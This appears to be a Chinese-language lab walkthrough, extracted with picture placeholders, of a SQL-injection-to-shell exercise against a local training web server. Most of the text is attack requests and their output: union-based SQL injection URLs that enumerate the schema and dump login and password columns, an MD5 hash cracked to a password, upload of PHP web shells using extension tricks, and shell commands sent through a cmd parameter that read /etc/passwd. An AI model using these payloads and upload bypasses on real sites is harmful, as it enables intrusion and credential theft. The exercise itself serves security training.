CONSTRAINT_SCHEMApicture: constraint_name CONSTRAINT_NAMEpicture: position_in_unique_constraint POSITION_IN_UNIQUE_CONSTRAINTpicture: referenced_table_schema REFERENCED_TABLE_SCHEMApicture: referenced_table_name REFERENCED_TABLE_NAMEpicture: referenced_column_name REFERENCED_COLUMN_NAMEpicture: partition_namePARTITION_NAMEpicture: subpartition_name SUBPARTITION_NAMEpicture: partition_ordinal_position PARTITION_ORDINAL_POSITIONpicture: subpartition_ordinal_position SUBPARTITION_ORDINAL_POSITIONpicture: partition_methodPARTITION_METHODpicture: subpartition_method SUBPARTITION_METHODpicture: partition_expression PARTITION_EXPRESSIONpicture: subpartition_expression SUBPARTITION_EXPRESSIONpicture: partition_description PARTITION_DESCRIPTIONpicture: partition_comment PARTITION_COMMENTpicture: nodegroupNODEGROUPpicture: plugin_namePLUGIN_NAMEpicture: plugin_version PLUGIN_VERSIONpicture: plugin_statusPLUGIN_STATUSpicture: plugin_typePLUGIN_TYPEpicture: plugin_type_version PLUGIN_TYPE_VERSIONpicture: plugin_library PLUGIN_LIBRARYpicture: plugin_library_version PLUGIN_LIBRARY_VERSIONpicture: plugin_author PLUGIN_AUTHORpicture: plugin_description PLUGIN_DESCRIPTIONpicture: plugin_license PLUGIN_LICENSEpicture: userUSERpicture: hostHOSTpicture: dbDBpicture: command COMMANDpicture: timeTIMEpicture: stateSTA TEpicture: infoINFOpicture: query_idQUERY_IDpicture: seqSEQpicture: duration DURATIONpicture: cpu_userCPU_USERpicture: cpu_systemCPU_SYSTEMpicture: context_voluntary CONTEXT_VOLUNTARYpicture: context_involuntary CONTEXT_INVOLUNTARYpicture: block_ops_in BLOCK_OPS_INpicture: block_ops_out BLOCK_OPS_OUTpicture: messages_sent MESSAGES_SENTpicture: messages_received MESSAGES_RECEIVEDpicture: page_faults_major PAGE_FAULTS_MAJORpicture: page_faults_minor PAGE_FAULTS_MINORpicture: swapsSWAPSpicture: source_functionSOURCE_FUNCTIONpicture: source_fileSOURCE_FILEpicture: source_lineSOURCE_LINEpicture: unique_constraint_catalog UNIQUE_CONSTRAINT_CA TALOGpicture: unique_constraint_schema UNIQUE_CONSTRAINT_SCHEMApicture: unique_constraint_name UNIQUE_CONSTRAINT_NAMEpicture: match_optionMATCH_OPTIONpicture: update_ruleUPDATE_RULEpicture: delete_ruleDELETE_RULEpicture: specific_nameSPECIFIC_NAMEpicture: routine_catalogROUTINE_CATALOGpicture: routine_schemaROUTINE_SCHEMApicture: routine_nameROUTINE_NAMEpicture: routine_typeROUTINE_TYPEpicture: dtd_identifierDTD_IDENTIFIERpicture: routine_bodyROUTINE_BODYpicture: routine_definitionROUTINE_DEFINITIONpicture: external_nameEXTERNAL_NAMEpicture: external_language EXTERNAL_LANGUAGEpicture: parameter_style PARAMETER_STYLEpicture: is_deterministicIS_DETERMINISTICpicture: sql_data_accessSQL_DA TA_ACCESSpicture: sql_pathSQL_PATHpicture: security_typeSECURITY_TYPEpicture: routine_commentROUTINE_COMMENTpicture: catalog_nameCA TALOG_NAMEpicture: schema_nameSCHEMA_NAMEpicture: default_character_set_name DEFAULT_CHARACTER_SET_NAMEpicture: default_collation_name DEFAULT_COLLATION_NAMEpicture: non_uniqueNON_UNIQUEpicture: index_schemaINDEX_SCHEMApicture: index_nameINDEX_NAMEpicture: seq_in_indexSEQ_IN_INDEXpicture: collationCOLLATIONpicture: cardinality CARDINALITYpicture: sub_partSUB_PARTpicture: packedPACKEDpicture: nullableNULLABLEpicture: index_typeINDEX_TYPEpicture: table_typeTABLE_TYPEpicture: auto_incrementAUTO_INCREMENTpicture: table_collationTABLE_COLLATIONpicture: create_options CREATE_OPTIONSpicture: table_commentTABLE_COMMENTpicture: constraint_type CONSTRAINT_TYPEpicture: trigger_catalog TRIGGER_CATALOGpicture: trigger_schema TRIGGER_SCHEMApicture: trigger_name TRIGGER_NAMEpicture: event_manipulation EVENT_MANIPULATIONpicture: event_object_catalog EVENT_OBJECT_CA TALOGpicture: event_object_schema EVENT_OBJECT_SCHEMApicture: event_object_table EVENT_OBJECT_TABLEpicture: action_orderACTION_ORDERpicture: action_condition ACTION_CONDITIONpicture: action_statement ACTION_STATEMENTpicture: action_orientation ACTION_ORIENTA TIONpicture: action_timingACTION_TIMINGpicture: action_reference_old_tableACTION_REFERENCE_OLD_TABLEpicture: action_reference_new_tableACTION_REFERENCE_NEW_TABLEpicture: action_reference_old_rowACTION_REFERENCE_OLD_ROWpicture: action_reference_new_rowACTION_REFERENCE_NEW_ROWpicture: view_definitionVIEW_DEFINITIONpicture: check_optionCHECK_OPTIONpicture: is_updatableIS_UPDATABLEpicture: titletitlepicture: imgimgpicture: catcatpicture: loginloginpicture: passwordhttp://192.168.128.128/cat.php?id=1%20union%20select%201,table_name,3,4%20from%20infor mation_schema.columns返回一堆信息http://192.168.128.128/cat.php?id=1%20union%20select%201,table_name,column_name,4%20fr om%20information_schema.columns返回一堆信息把concat(table_name,%27:%27,column_name)评在一起http://192.168.128.128/cat.php?id=1%20union%20select%201,concat(table_name,%27:%27,colu mn_name),3,4%20from%20information_schema.columns返回一堆table_name和column_name信息picture: users:idusers:idpicture: users:loginusers:loginpicture: users:passwordhttp://192.168.128.128/cat.php?id=1%20union%20select%201,concat(login,%27:%27,password),http://192.168.128.128/cat.php?id=1%20union%20select%201,concat(id,%27:%27,login,%27:%2在/md5-decrypter.aspx查询到8efe310f9ab3efeae8d410a8e0166eb2 MD5 : P4ssw0rd登陆后台,上传test1.php3INSERT INTO pictures (title, img, cat) VALUES ('','test1.php3','1'上传test2.php.aaaINSERT INTO pictures (title, img, cat) VALUES ('test','test2.php.aaa','1')页面审查元素发现,图片路径是admin/uploadshttp://192.168.128.128/admin/uploads/test1.php3?cmd=lscthulhu.png hacker.png ruby.jpg test1.php3 test2.php.aaahttp://192.168.128.128/admin/uploads/test1.php3?cmd=uname%20-aLinux debian 2.6.32-5-686 #1 SMP Sun May 6 04:01:19 UTC 2012 i686 GNU/Linuxhttp://192.168.128.128/admin/uploads/test1.php3?cmd=whoamiwww-datahttp://192.168.128.128/admin/uploads/test2.php.aaa?cmd=pwd/var/www/admin/uploadshttp://192.168.128.128/admin/uploads/test2.php.aaa?cmd=cat%20/etc/passwdroot:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/shbackup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/shlibuuid:x:100:101::/var/lib/libuuid:/bin/sh mysql:x:101:103:MySQL Server,,,:/var/lib/mysql:/bin/falsesshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin user:x:1000:1000:Debian Live user,,,:/home/user:/bin/bash。